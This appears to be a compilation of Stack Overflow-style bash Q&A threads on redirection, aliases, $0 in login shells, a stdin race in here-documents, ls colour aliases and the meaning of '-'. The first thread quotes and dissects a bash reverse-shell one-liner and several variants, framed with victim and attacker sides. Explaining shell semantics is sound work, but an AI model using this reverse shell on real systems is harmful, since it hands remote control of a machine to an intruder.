Bash reverse shell strange behavior - linux

Today I tried to understand, as well as I could, a command (found here) that opens a reverse shell on the victim side. Here it is:
bash -i >&/dev/tcp/ip/port 0>&1
However, I didn't completely get why the first redirection is >&. I understood that /dev/tcp/ip/port is a "pseudo" file created by bash, but I couldn't find out whether it has to be treated as a real file or as a file descriptor. Therefore, I tried to treat it like a real file and rewrote the bash command like this:
bash -i >/dev/tcp/ip/port 0>&1
In this case, a strange behavior happens: the reverse shell works as expected (I can type commands on the attacker side and get the output on the attacker side too), except for one piece of output: the bash command prompt. The only thing that is printed on the victim side rather than the attacker side is:
bash-4.4$
Everything else is printed as expected, i.e., on the attacker side.
The last test I tried was to change the bash command like this:
bash -i >/dev/tcp/ip/port <&1
Indeed, after reading the bash man page, it made more sense to me to use the < redirection since, as the man page states, it duplicates file descriptor 1 onto file descriptor 0 for reading. Here, the same problem as with the second command arises (everything is printed on the attacker side except the bash command prompt bash-4.4$).
I also noted that redirecting stderr like this:
bash -i >/dev/tcp/ip/port 2>&1 <&1
solves the problem, as if bash-4.4$ were printed on stderr...
I thus have four questions for which I cannot find an answer:
Should /dev/tcp and /dev/udp be treated as files or directly as file descriptors? Which is equivalent to asking: should we write echo "hello" >/dev/tcp/ip/port or echo "hello" >&/dev/tcp/ip/port?
Why did the author use 0>&1 to change stdin instead of <&1, and how is it possible that it works in the first version of the command?
Why does this strange behavior happen with the second and third commands? How is it possible that only part of the output is redirected? From my point of view, it should redirect either everything or nothing.
Why does redirecting stderr in the last command solve the problem? This is not done in the first command (the author's original), yet that one still works.
Thank you very much in advance for your answers! I hope I made this post as clear as possible.

A file descriptor in bash is a number, i.e. one or more digits, so /dev/… is definitely not a file descriptor. You were misled by the special construct >&, which, unless followed by a number, is not the redirection operator for duplicating an output file descriptor, but the unpreferred format for redirecting standard output and standard error.
Why the author used 0>&1 to change stdin instead of <&1, only he (or someone who can read his mind) can tell; I agree with you that it makes more sense to use the < redirection. Both versions work because &1 refers to /dev/tcp/ip/port, which can be read from as well as written to.
The behavior is not strange at all, since, as you already wrote, the prompt is printed on stderr.
Well, redirecting stderr is done in the first command by >&.
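To make the >& point concrete, here is a minimal demo (no real victim needed; the host, port, and /tmp paths are only examples):
# >&file redirects BOTH stdout and stderr to file; it is shorthand for >file 2>&1:
{ echo out; echo err >&2; } >&/tmp/both.txt      # /tmp/both.txt gets "out" and "err"
# >file alone redirects only stdout; stderr (including the interactive prompt) stays on the terminal:
{ echo out; echo err >&2; } >/tmp/out_only.txt   # /tmp/out_only.txt gets only "out"
# /dev/tcp/... is used like a file path, so the plain > operator is correct:
echo "hello" >/dev/tcp/127.0.0.1/8080            # requires a listener on the other end (e.g. nc -l 8080)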

Related

Command works in terminal but not as alias in profile.d

I have a problem regarding an alias file in /etc/profile.d/. This isn't anything important; I'm just interested in why it isn't working as expected.
So basically I have the file 00-alias.sh at the path mentioned above and I wanted to make a shortcut which reads a specific line of a file. So this is my code:
alias lnn='sed -n "${1}p" < "${2}"'
With that code I should be able to perform a command like
$ lnn 4 test.txt
However, this doesn't work. I simply get the error
-bash: : No such file or directory
Now I thought: OK, maybe relative paths aren't working because the file is located at /etc/profile.d/00-alias.sh.
So I went ahead and made a new alias like
alias pwd2='echo $(pwd)'
Then I updated the profile.d with
source /etc/profile.d/00-alias.sh
And just tried pwd2, and that echoed the path I was currently in. So in theory the file can be found with the command I wrote. I still tried to pass the file to my alias with an absolute path, like
$ lnn 4 /var/test.txt
Still same error as above.
But, if I enter the command of the alias in the terminal like
sed -n "4p" < test.txt
It works perfectly fine, no matter whether I put quotes around test.txt.
And here is another weird thing: If I write
alias lnn='sed -n "${1}p" < ${2}'
without the quotes around ${2} I get the error
-bash: ${2}: ambiguous redirect
In the terminal it works just fine...
So, what am I doing wrong? Does anyone have an idea on this? I'd love to know my mistake. But as I said, this isn't a real problem as I'm just curious why bash behaves like that.
Aliases in bash do not take parameters of any form. Save the pain and use a function instead.
function lnn() {
    sed -n "${1}p" < "${2}"
}
Add the function to the file 00-alias.sh and source it once before calling the function from the command line.
source /etc/profile.d/00-alias.sh
lnn 4 test.txt
See more information at BashFAQ/80: How can I make an alias that takes an argument?
You can't. Aliases in bash are extremely rudimentary, and not really suitable for any serious purpose. The bash man page even says so explicitly:
An excerpt from the GNU bash man page, about aliases
… There is no mechanism for using arguments in the replacement text. If arguments are needed, a shell function should be used.
On a side note, the problem has nothing to do with relative paths. Just remember that aliases are not expanded in scripts by default; they're only expanded in interactive shells. If you're writing a script, always use a function instead.
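To see why the alias fails, it helps to trace the expansion by hand (a sketch; $1 and $2 here are the interactive shell's positional parameters, which are normally unset):
# `lnn 4 test.txt` expands the alias text first and then appends the words:
#   sed -n "${1}p" < "${2}" 4 test.txt
# With $1 and $2 unset, this is effectively:
#   sed -n "p" < "" 4 test.txt
# Redirecting from the empty string "" is what produces "No such file or directory";
# with ${2} unquoted, the empty expansion produces "ambiguous redirect" instead.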

$0 gives different results on Redhat versus Ubuntu?

I have the following script, created by some self-proclaimed bash expert:
SCRIPT_LOCATION="$(readlink -f $0)"
SCRIPT_DIRECTORY="$(dirname ${SCRIPT_LOCATION})"
export PYTHONPATH="${PYTHONPATH}:${SCRIPT_DIRECTORY}/util"
That runs nicely on my local Ubuntu 16.04. Now I wanted to use it on our RH 7.2 servers, and there I got an error message from readlink about being called with bad parameters.
Then I figured out that on Ubuntu, $0 gives "bash", whereas on RH it gives "-bash".
EDIT: script is invoked as . ourscript.sh
Questions:
Any idea why that is?
When I change my script to use a hardcoded readlink -f bash, the whole thing works. Are there "better" ways of fixing this?
Feel free to also explain what readlink -f bash is actually doing ;-)
As the script is sourced, readlink -f $0 is pointless: it will just show you the command used to run the shell you are currently using.
To explain the difference in the command name, let's look at the bash man page:
A login shell is one whose first character of argument zero is a -, or one started with the --login option.
When bash is invoked as an interactive login shell, or as a non-interactive shell with the --login option, it first reads and executes commands from the file /etc/profile, if that file exists. After reading that file, it looks for ~/.bash_profile, ~/.bash_login, and ~/.profile, in that order, and reads and executes commands from the first one that exists and is readable. The --noprofile option may be used when the shell is started to inhibit this behavior.
So presumably the shell on Ubuntu was not started as a login shell, while on RH it was; the leading - is what marks a login shell.
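You can check this directly on both machines (a quick sketch using standard bash facilities):
echo $0                                       # "-bash" for a login shell, "bash" otherwise
shopt -q login_shell && echo login || echo non-login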
As for readlink, we can again look at the man page:
-f, --canonicalize
canonicalize by following every symlink in every component of the given name recursively; all but the last component must exist
Therefore it follows symlinks to the base.
Using readlink -f with any non-qualified path will result in it just appending the last argument to your current working directory, which will not actually show where the script is run.
Try putting any random string instead of bash after it and you will see the script is unaffected.
e.g.
readlink -f dafsfdsf
Returns
/home/me/testscript/dafsfdsf
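For a script that is meant to be sourced, a more robust alternative (a sketch, assuming bash) is ${BASH_SOURCE[0]}, which names the script file itself even under . ourscript.sh, while $0 names the invoking shell:
# ${BASH_SOURCE[0]} points at the script file even when the script is sourced.
SCRIPT_LOCATION="$(readlink -f "${BASH_SOURCE[0]}")"
SCRIPT_DIRECTORY="$(dirname "${SCRIPT_LOCATION}")"
export PYTHONPATH="${PYTHONPATH}:${SCRIPT_DIRECTORY}/util"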

Bash Command Substitution Giving Weird Inconsistent Output

For reasons not relevant to this question, I am running a Java server in a bash script, not directly but via command substitution in a separate sub-shell, and in the background. The intent is for the subcommand to return the process id of the Java server as its standard output. The fragment in question is as follows:
launch_daemon()
{
/bin/bash <<EOF
$JAVA_HOME/bin/java $JAVA_OPTS -jar $JAR_FILE daemon $PWD/config/cl.yml <&- &
pid=\$!
echo \${pid} > $PID_FILE
echo \${pid}
EOF
}
daemon_pid=$(launch_daemon)
echo ${daemon_pid} > check.out
The Java daemon in question prints to standard error and quits if there is a problem in initialization, otherwise it closes standard out and standard err and continues on its way. Later in the script (not shown) I do a check to make sure the server process is running. Now on to the problem.
Whenever I check the $PID_FILE above, it contains the correct process id on one line.
But when I check the file check.out, it sometimes contains the correct id; other times it contains the process id repeated twice on the same line, separated by a space character, as in:
34056 34056
I use the variable $daemon_pid later on in the script to check whether the server is running, so if it contains the pid repeated twice, this throws off the test and the script incorrectly concludes the server is not running. Fiddling with the script on my CentOS Linux server box (putting in more echo statements, etc.) seems to flip the behavior back to the correct one, with $daemon_pid containing the process id just once; but when I think that has fixed it, check the script in to my source code repo, and build and deploy again, I start seeing the same bad behavior.
For now I have fixed this by assuming that $daemon_pid could be bad and passing it through awk as follows:
mypid=$(echo ${daemon_pid} | awk '{ gsub(" +.*",""); print $0 }')
Then $mypid always contains the correct process id and things are fine, but needless to say I'd like to understand why it behaves the way it does. And before you ask, I have looked and looked but the Java server in question does NOT print its process id to its standard out before closing standard out.
Would really appreciate expert input.
Following the hint by @WilliamPursell, I tracked this down in the bash source code. I honestly don't know whether it is a bug or not; all I can say is that it seems like an unfortunate interaction with a questionable use case.
TL;DR: You can fix the problem by removing <&- from the script.
Closing stdin is at best questionable, not just for the reason mentioned by @JonathanLeffler ("Programs are entitled to have a standard input that's open.") but more importantly because stdin is being used by the bash process itself, and closing it in the background causes a race condition.
In order to see what's going on, consider the following rather odd script, which might be called Duff's Bash Device, except that I'm not sure that even Duff would approve: (also, as presented, it's not that useful. But someone somewhere has used it in some hack. Or, if not, they will now that they see it.)
/bin/bash <<EOF
if (($1<8)); then head -n-$1 > /dev/null; fi
echo eight
echo seven
echo six
echo five
echo four
echo three
echo two
echo one
EOF
For this to work, bash and head both have to be prepared to share stdin, including sharing the file position. That means that bash needs to make sure that it flushes its read buffer (or not buffer), and head needs to make sure that it seeks back to the end of the part of the input which it uses.
(The hack only works because bash handles here-documents by copying them into a temporary file. If it used a pipe, it wouldn't be possible for head to seek backwards.)
Now, what would have happened if head had run in the background? The answer is, "just about anything is possible", because bash and head are racing to read from the same file descriptor. Running head in the background would be a really bad idea, even worse than the original hack which is at least predictable.
Now, let's go back to the actual program at hand, simplified to its essentials:
/bin/bash <<EOF
cmd <&- &
echo \$!
EOF
Line 2 of this program (cmd <&- &) forks off a separate process (to run in the background). In that process, it closes stdin and then invokes cmd.
Meanwhile, the foreground process continues reading commands from stdin (its stdin fd hasn't been closed, so that's fine), which causes it to execute the echo command.
Now here's the rub: bash knows that it needs to share stdin, so it can't just close stdin. It needs to make sure that stdin's file position is pointing to the right place, even though it may have actually read ahead a buffer's worth of input. So just before it closes stdin, it seeks backwards to the end of the current command line. [1]
If that seek happens before the foreground bash executes echo, then there is no problem. And if it happens after the foreground bash is done with the here-document, also no problem. But what if it happens while the echo is working? In that case, after the echo is done, bash will reread the echo command because stdin has been rewound, and the echo will be executed again.
And that's precisely what is happening in the OP. Sometimes, the background seek completes at just the wrong time, and causes echo \${pid} to be executed twice. In fact, it also causes echo \${pid} > $PID_FILE to execute twice, but that line is idempotent; had it been echo \${pid} >> $PID_FILE, the double execution would have been visible.
So the solution is simple: remove <&- from the server start-up line, and optionally replace it with </dev/null if you want to make sure the server can't read from stdin.
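Applied to the original fragment, the fix would look like this (a sketch reusing the question's placeholders):
launch_daemon()
{
/bin/bash <<EOF
$JAVA_HOME/bin/java $JAVA_OPTS -jar $JAR_FILE daemon $PWD/config/cl.yml </dev/null &
pid=\$!
echo \${pid} > $PID_FILE
echo \${pid}
EOF
}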
Notes:
Note 1: For those more familiar with the bash source code and its expected behaviour than I am: I believe the seek and close take place at the end of case r_close_this: in function do_redirection_internal in redir.c, at approximately line 1093:
check_bash_input (redirector);
close_buffered_fd (redirector);
The first call does the lseek and the second one does the close. I saw the behaviour using strace -f and then searched the code for a plausible-looking lseek, but I didn't go to the trouble of verifying it in a debugger.
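For the curious, the racing syscalls can be observed without a debugger (a sketch; script.sh stands for the simplified program above):
strace -f -e trace=read,lseek,close bash script.sh
# Look for the background child doing lseek(0, ...) followed by close(0)
# while the parent is still read()ing commands from fd 0.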

Commands work from Shell script but not from command line?

I quickly searched for this before posting, but could not find any similar posts. Let me know if they exist.
The commands being executed seem very simple. A directory listing is used as the input for a function.
The directory contains a bunch of files named "epi1_mcf_0###.nii.gz"
Command-line version (bash is running when this is executed):
fslmerge -t output_file `ls epi1_mcf_0*.nii.gz`
Shell script version:
#!/bin/bash
fslmerge -t output_file `ls epi1_mcf_0*.nii.gz`
The command-line version fails, but the shell script one works perfectly.
The error message is specific to the function, but it's included anyway.
** ERROR (nifti_image_read): failed to find header file for 'epi1_mcf_0000.nii.gz'
** ERROR: nifti_image_open(epi1_mcf_0000.nii.gz): bad header info
Error: failed to open file epi1_mcf_0000.nii.gz
Cannot open volume epi1_mcf_0000.nii.gz for reading!
I have been very frustrated with this problem (less so after I figured out that there was a way to get the command to work).
Any help would be appreciated.
(Or is the general consensus that the problem should be looked for in the "fslmerge" function?)
`ls epi1_mcf_0*.nii.gz` is better written as simply epi1_mcf_0*.nii.gz. As in:
fslmerge -t output_file epi1_mcf_0*.nii.gz
The `ls` doesn't add anything.
Note: Posted as an answer instead of comment. The Markdown-lite comment parser choked on my `` `ls epi1_mcf_0*.nii.gz` `` markup.
(I mentioned this in a comment first, but I'll make an answer since it helped!)
Do you have any shell aliases defined? (Type alias) Those will affect commands typed at the command line, but not scripts.
Linux often has ls defined as ls --color. This may affect the output since the colour codes are sent as escape codes through the regular output stream. If you use ls --color=auto it will auto-detect whether its output is a terminal or not. From man ls:
By default, color is not used to distinguish types of files. That is equivalent to using --color=none. Using the --color option without the optional WHEN argument is equivalent to using --color=always. With --color=auto, color codes are output only if standard output is connected to a terminal (tty).
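A quick way to check whether an alias is getting in the way on the affected machine (the alias name and files are from the question; the leading backslash and the command builtin both bypass aliases):
alias ls                         # show what ls currently expands to, if anything
type ls                          # also catches shell functions
\ls epi1_mcf_0*.nii.gz           # run ls with any alias bypassed
command ls epi1_mcf_0*.nii.gz    # equivalent, using the command builtin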

what does '-' stand for in bash?

What exactly are the uses of '-' in bash? I know it can be used for
cd - # to take you to the old 'present working directory'
some stream-generating command | vim - # somehow vim gets the text.
My question is what exactly is - in bash? In what other contexts can I use it?
That depends on the application.
cd -
returns to the last directory you were in.
Often - stands for stdin or stdout. For example:
xmllint -
does not check an XML file but checks the XML on stdin. Sample:
xmllint - <<EOF
<root/>
EOF
The same is true for cat:
cat -
reads from stdin. One last sample, where - stands for stdout:
wget -O- http://google.com
will fetch google.com over HTTP and write it to stdout.
By the way: That has nothing to do with your shell (e.g. bash). It's only semantics of the called application.
- in bash has no meaning as a standalone argument (I would not go as far as to say it does not have a meaning in the shell at all; it is used in expansion, for example: ls [0-9]* lists all files starting with a digit).
As far as being a standalone parameter value, bash does absolutely nothing special with it and passes it to the command as-is.
What the command does with it is up to each individual program - can be pretty much anything.
There's a commonly used convention that a - argument indicates to a program that input should be read from STDIN instead of a file. Again, this is merely how many programs are coded and technically has nothing to do with bash.
From tldp:
This can be done for instance using a hyphen (-) to indicate that a program should read from a pipe
This explains how your vim example gets its data.
There is no universal rule here; the meaning changes with the context.
cd - is pretty useful when you have something to do repeatedly in two directories. See tip #4 here: http://www.thegeekstuff.com/2008/10/6-awesome-linux-cd-command-hacks-productivity-tip3-for-geeks/
In many places it means STDIN.
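For example, cd - is built on the shell variable $OLDPWD, so it simply toggles between the two most recent directories:
cd /tmp
cd /var/log
cd -             # back to /tmp; bash prints the directory it changed to
cd -             # back to /var/log again
echo "$OLDPWD"   # the variable that cd - reads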
